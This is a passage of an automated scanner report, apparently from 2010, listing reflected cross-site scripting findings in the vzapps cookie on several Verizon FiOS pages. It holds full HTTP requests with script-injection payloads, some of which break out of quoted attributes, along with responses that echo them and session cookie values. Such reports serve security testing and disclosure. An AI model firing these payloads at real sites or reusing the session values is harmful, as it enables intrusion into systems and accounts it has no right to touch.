Content-Type: text/html; charset=utf-8
Content-Length: 69784
Expires: Sat, 20 Nov 2010 02:06:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:06:57 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:06:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX54438<script>alert(1)</script>f68ab918137; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:57 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX54438<SCRIPT>ALERT(1)</SCRIPT>F68AB918137 </DIV>
...[SNIP]...

1.64. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 93e85<script>alert(1)</script>33520c9d41d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX93e85<script>alert(1)</script>33520c9d41d; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 114981
Expires: Sat, 20 Nov 2010 02:08:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:08:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX93e85<script>alert(1)</script>33520c9d41d; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FiOS Internet: FAQs
</title><meta name="keywords" content="FiOS Internet FAQs, fios faqs, verizon fios faqs, fios details, fios informatio
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX93E85<SCRIPT>ALERT(1)</SCRIPT>33520C9D41D </DIV>
...[SNIP]...

1.65. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4453b'><script>alert(1)</script>c8f03bc5c2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX4453b'><script>alert(1)</script>c8f03bc5c2c; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 114985
Expires: Sat, 20 Nov 2010 02:08:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:08:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4453b'><script>alert(1)</script>c8f03bc5c2c; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FiOS Internet: FAQs
</title><meta name="keywords" content="FiOS Internet FAQs, fios faqs, verizon fios faqs, fios details, fios informatio
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4453B'><SCRIPT>ALERT(1)</SCRIPT>C8F03BC5C2C ' />
...[SNIP]...

1.66. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e0749<script>alert(1)</script>7afbaeb2733 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXe0749<script>alert(1)</script>7afbaeb2733; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75659
Expires: Sat, 20 Nov 2010 02:07:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:07:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:07:22 GMT; path=/
Set-Cookie: ContextInfo_State=TXe0749<script>alert(1)</script>7afbaeb2733; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:22 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE0749<SCRIPT>ALERT(1)</SCRIPT>7AFBAEB2733 </DIV>
...[SNIP]...

1.67. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5dd9c'><script>alert(1)</script>b30b9be12d5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX5dd9c'><script>alert(1)</script>b30b9be12d5; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75663
Expires: Sat, 20 Nov 2010 02:07:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:07:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:07:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX5dd9c'><script>alert(1)</script>b30b9be12d5; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5DD9C'><SCRIPT>ALERT(1)</SCRIPT>B30B9BE12D5 ' />
...[SNIP]...

1.68. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 586d6'><script>alert(1)</script>5be2a55a080 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX586d6'><script>alert(1)</script>5be2a55a080; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117562
Expires: Sat, 20 Nov 2010 02:07:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:07:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:07:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX586d6'><script>alert(1)</script>5be2a55a080; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:43 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX586D6'><SCRIPT>ALERT(1)</SCRIPT>5BE2A55A080 ' />
...[SNIP]...

1.69. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ba4bc<script>alert(1)</script>48da8e83bed was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXba4bc<script>alert(1)</script>48da8e83bed; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119100
Expires: Sat, 20 Nov 2010 02:07:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:07:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:07:44 GMT; path=/
Set-Cookie: ContextInfo_State=TXba4bc<script>alert(1)</script>48da8e83bed; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXBA4BC<SCRIPT>ALERT(1)</SCRIPT>48DA8E83BED </DIV>
...[SNIP]...

1.70. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9e24d'><script>alert(1)</script>e7ebdde17b7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX9e24d'><script>alert(1)</script>e7ebdde17b7; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117594
Expires: Sat, 20 Nov 2010 02:08:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:08:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:08:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX9e24d'><script>alert(1)</script>e7ebdde17b7; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:08:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:08:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:08:33 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9E24D'><SCRIPT>ALERT(1)</SCRIPT>E7EBDDE17B7 ' />
...[SNIP]...

1.71. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ef4f6<script>alert(1)</script>b1777447616 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXef4f6<script>alert(1)</script>b1777447616; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119132
Expires: Sat, 20 Nov 2010 02:08:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:08:34 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:08:34 GMT; path=/
Set-Cookie: ContextInfo_State=TXef4f6<script>alert(1)</script>b1777447616; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:08:34 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:08:34 GMT; path=/
